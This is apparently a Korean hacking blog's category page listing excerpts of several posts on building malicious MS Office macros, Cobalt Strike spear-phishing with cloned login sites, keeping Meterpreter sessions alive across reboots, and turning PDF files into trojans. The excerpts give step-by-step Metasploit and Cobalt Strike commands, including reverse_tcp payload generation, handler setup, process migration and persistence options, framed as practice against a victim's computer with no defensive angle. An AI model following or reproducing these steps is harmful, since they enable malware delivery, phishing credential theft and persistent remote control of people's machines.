본문 바로가기

분류 전체보기257

MS오피스 문서파일로 악성코드 만들기 Macro를 사용합니다. 1.use windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 7777 generate -f vba // generate로 각종 스크립트를 만드는데 -f는 아웃풋 옵션, vba는 비주얼베이직 애플리케이션 아웃풋입니다. 위 명령어를 담은 macro.rc 파일을 만들어줍니다. [호스트와 포트는 각자 설정] 2. msfconsole -r macro.rc로 실행 3.나온 vbs 구문을 복사해서 저장해둡니다. [#if... 뭐시기 부터 마지막 end sub 까지 전부 복사] 4.리스닝을 위해 핸들러를 틀어줍니다. [msfconsole -r handler.rc] 5.윈도우에서 워드를 틀고 매크로 기능에서 매크로 추가 -> 이름은 아무거.. 2023. 12. 27.
스피어 피싱 공격 [코발트 스트라이크,이메일 파싱] 준비 - 코발트 스트라이크, 이메일 템플릿 파싱,포트포워딩,타깃 메일주소 txt 파일 0.포트포워딩이 선제적으로 되어야하는데 이메일 서버로 활용할 80포트 하나, 공격에 활용할 8080포트 하나씩 포트포워딩 한다. [공유기 설정에서, 8080 말고 다른포트번호도 가능] 1.이메일 템플릿은 가짜 이메일 형식을 보낼 적절한 템플릿을 메일에서 show original 혹은 기타 메일 템플릿 코드를 얻어두면 된다. 2.코볼트 스트라이크에서 web drive by -> clone site 로 간다. 이는 가짜 웹사이트를 만드는 기능 3.템플릿에 어울리는 가짜사이트 생성 (ex - 가짜 네이버 로그인 메일 시도 메일을 보냈다면 네이버 가짜 사이트를 생성) clone url에 가짜사이트로 만들 url을 넣어준다. 포.. 2023. 12. 27.
껐다 켜도 해킹 세션을 유지시키는 방법 [persistence] 1.우선적으로 피해자 컴퓨터를 해킹하여 msf를 이용 세션을 잡아 놓은 상태를 만듭니다. putty.exe 파일을 바이러스로 만드는경우 프로그램을 종료하면 세션이 닫히기 때문에 exe 바이러스로 하는것이 실습에 좋습니다. 2.migrate [explorer 프로세스 아이디] 명령을 쳐줍니다. 이는 exe파일에 가 있는 세션을 익스플로러 프로세스로 이동시키는 것입니다. 프로세스 아이디는 sessions -i 1 등으로 세션을 잡은 뒤 ps로 검색하여 찾아봅니다. [persistence 사용시 migrate는 하지 않아도 되나 하는것이 좋습니다.] 3.run persistence -h 를 검색하면 도움말이 나욥니다. -U는 사용자가 로그인시 세션을 재시작하는 옵션입니다. -p 는 포트번호 -r은 공격자의 내.. 2023. 12. 27.
MSF pdf파일을 트로이목마로 만들기 1.use exploit/windows/fileformat/adobe_pdf_embedded_exe 2.set payload windows/meterpreter/reverse_tcp 3.set lhost 공격자아이피 4.set lport 아무 포트번호 5.set infilename pdf파일경로 6.exploit 2023. 12. 27.